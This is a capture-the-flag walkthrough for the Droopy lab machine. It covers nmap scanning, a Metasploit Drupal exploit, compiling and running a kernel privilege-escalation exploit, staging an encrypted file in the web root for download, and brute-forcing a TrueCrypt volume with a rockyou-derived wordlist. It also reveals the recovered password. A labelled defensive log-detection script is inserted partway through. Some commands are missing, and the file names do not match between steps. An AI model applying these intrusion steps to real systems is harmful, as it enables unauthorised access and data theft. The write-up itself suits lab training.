In this post, you will learn how to solve the Droopy CTF. This is a really easy challenge, so stick with it till the end and I am sure you will be able to crack the box.
If you have any doubts, leave your question on the Discord server.
To download Droopy [Click here]
There is 1 flag in Droopy and we have to find it.
Hacking Phases in Droopy CTF
- Finding target IP
- Network Scanning (Nmap)
- Identifying Drupal CMS
- Exploiting Drupal CMS (Metasploit)
- Privilege Escalation with Kernel Exploit
- Uploading and Downloading dave.tc from /www/html
- Generate a Dictionary with the help of rockyou.txt
- Brute Force attack on Truecrypt Volume (Truecrack)
- Decrypting File (Veracrypt)
- Capture the Flag
Finding target IP
To find the target IP, run arp-scan -l or the netdiscover command.
Next, run a full port scan with OS and service detection.
nmap -p- -A 192.168.1.4
I found that port 80 is open and just opened the web browser to view the target.
Identifying Drupal CMS
Head to the target website to have a look at it.
The website is powered by Drupal, and there is an exploit available for Drupal CMS.
Exploiting Drupal CMS (Metasploit)
set rhost 192.168.1.4
Wait for the Meterpreter shell to open.
Privilege Escalation with Kernel Exploit
Open another terminal and type searchsploit 3.13.0
Copy the exploit at this path to your home directory: /usr/share/exploitdb/exploits/linux/local/37292.c
Once you have saved it, go back to the Meterpreter shell and type.
Once the exploit is uploaded, enter:
python -c 'import pty;pty.spawn("/bin/bash")'
gcc 37292.c -o shell
chmod 777 shell
Run ./shell to execute the exploit.
cp dave.tc /var/www/html
Uploading and Downloading dave.tc from /www/html
Now open a web browser and enter the target IP and this URL.
Now save the file dave.tc
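From the defender's side, copying dave.tc into /var/www/html and then fetching it over HTTP leaves a trace in the web server's access log. The following is an added example, not part of the original walkthrough: it flags large successful GETs for container or archive files, and the extension list, size threshold and sample log lines are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# "combined" access-log line: host ident user [time] "METHOD path PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumption: extensions a CMS web root has no reason to serve
# (encrypted containers, archives, database dumps, backups).
SUSPECT_EXT = {".tc", ".hc", ".zip", ".tar", ".gz", ".7z", ".sql", ".bak", ".kdbx"}
MIN_BYTES = 1_000_000  # assumption: larger than any page or theme asset on this site


def flag_staged_downloads(lines, suspect_ext=SUSPECT_EXT, min_bytes=MIN_BYTES):
    """Return (src, path, size) for successful GETs that look like a file staged in the web root."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET" or m["status"] not in ("200", "206"):
            continue  # unparsable line, other method, or the file was not served
        path = m["path"].split("?", 1)[0]  # drop any query string
        size = 0 if m["size"] == "-" else int(m["size"])
        ext = PurePosixPath(path).suffix.lower()
        if ext in suspect_ext and size >= min_bytes:
            hits.append((m["src"], path, size))
    return hits


# Constructed sample lines (addresses, times and sizes are made up for this example).
SAMPLE_LOG = [
    '192.168.1.7 - - [10/Mar/2020:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 7412 "-" "Mozilla/5.0"',
    '192.168.1.7 - - [10/Mar/2020:10:01:03 +0000] "GET /misc/drupal.js HTTP/1.1" 200 14544 "-" "Mozilla/5.0"',
    '192.168.1.7 - - [10/Mar/2020:10:14:40 +0000] "GET /dave.tc HTTP/1.1" 200 5242880 "-" "Mozilla/5.0"',
    '192.168.1.9 - - [10/Mar/2020:10:15:00 +0000] "GET /backup.zip HTTP/1.1" 404 209 "-" "curl/7.58.0"',
    '192.168.1.7 - - [10/Mar/2020:10:16:00 +0000] "GET /sites/default/files/logo.PNG HTTP/1.1" 200 2400000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for src, path, size in flag_staged_downloads(SAMPLE_LOG):
        print(f"ALERT staged-file download: {src} fetched {path} ({size} bytes)")
```

Only the /dave.tc request is flagged: the 404 for the archive and the large image are ignored, which keeps the rule quiet on normal site traffic.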
Generate a Dictionary with the help of rockyou.txt
Generate a dictionary list to crack the dave.tc file; the flag is hidden inside dave.tc.
cat rockyou.txt | grep academy > /root/Desktop/dict.txt
Brute Force attack on Truecrypt Volume (Truecrack)
To crack the password
truecrack --truecrypt /home/osboxes/Downloads/dave.tc -k SHA512 -w paas.tx
The password for the dave.tc file is etonacademy.
Decrypting File (Veracrypt)
To decrypt the file, we use VeraCrypt.
Once the file is decrypted, open it in a terminal.
Capture the Flag